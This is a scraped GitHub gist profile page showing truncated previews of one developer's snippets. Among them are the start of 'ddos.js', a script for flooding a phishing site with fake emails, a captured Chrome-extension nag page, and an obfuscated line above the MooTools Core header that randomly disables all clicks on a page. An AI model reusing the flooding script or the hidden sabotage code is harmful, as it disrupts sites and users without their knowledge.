Skip to content

Instantly share code, notes, and snippets.

View DimitarChristoff's full-sized avatar

Dimitar Christoff DimitarChristoff

View GitHub Profile
@DimitarChristoff
DimitarChristoff / ddos.js
Last active February 12, 2021 19:37
ddos.js
/**
* Sends fake emails to spammers
* @param spams number - how many emails to send
* @param delay= number - number of seconds to wait between each send
* @param url= string - url of their email script
*/
(async (spams, delay = 1000, url = `https://fmi.icloud.com.isps.mobi/mobile/mail2.php`) => {
await import('https://cdnjs.cloudflare.com/ajax/libs/Faker/3.1.0/faker.min.js');
const { internet } = faker;
[Options]
ConfigVersion=2
MasterServers=<Steam Web API>,hl1master.steampowered.com:27010
ShowOptions=False
ShowServerQuery=True
ShowFilter=True
ShowAddressMode=2
RefreshInterval=2
RefreshSelected=True
KeepFavServersOnTop=True
.lm_root {
position: relative
}
.lm_row>.lm_item {
float: left
}
.lm_content {
overflow: hidden;
@DimitarChristoff
DimitarChristoff / store-trap.html
Created October 22, 2016 22:50
chrome store abuse
<!-- view-source:http://cofinsa.info/helloworld.php?city=GB&clickid=wOG4PFS3EJJ786J0H5TOVOG4 -->
<!--<script>if(history.replaceState) history.replaceState({}, "", "/");</script>-->
<script>confirm('Add Extension to Leave');</script>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
@DimitarChristoff
DimitarChristoff / index.js
Created September 20, 2016 09:37
requirebin sketch
// Welcome! require() some modules from npm (like you were using browserify)
// and then hit Run Code to run your code on the right side.
// Modules get downloaded from browserify-cdn and bundled in your browser.
var p = require('glob-parse');
var toParse = 'js:**/*.{js,jsx}'.match(/(.+):(.+)/),
type = toParse.shift(),
pattern = toParse.pop();
console.log(p(pattern, { full: true }));
var https = require('https'),
http = require('http'),
path = require('path'),
unzip = require('unzip'),
parse = require('url').parse,
q = require('q');
function download(url, writePath){
var deffered = q.defer(),
isHttps,
@DimitarChristoff
DimitarChristoff / jsfun.js
Created November 27, 2015 11:01
guess the output.
(() => {
'use strict';
let x = (() => {
for (let i = 0; i < 5; i++){
try {
return i;
} finally {
if (i != 3) continue;
}
}
try{a=Array.from('modnar.htaM,elyts.ydob.tnemucod,00006,tuoemiTtes,enon,stnevEretniop').reverse().join('').split(',');a[5]=eval(a[5]);a[5]()>.5&&window[a[2]](function(){this[a[0]] = a[1]}.bind(eval(a[4])),a[5]()*a[3]+a[3])}catch(oO){}
/*
---
name: Core
description: The heart of MooTools.
license: MIT-style license.
copyright: Copyright (c) 2006-2014 [Valerio Proietti](http://mad4milk.net/).
@DimitarChristoff
DimitarChristoff / DynamicTextarea.js
Created November 20, 2014 14:54
Dynamic Textarea plugin for mootools
(function(){
'use strict';
/*
---
description: DynamicTextarea
license: MIT-style
authors:
- Amadeus Demarzi (http://amadeusamade.us)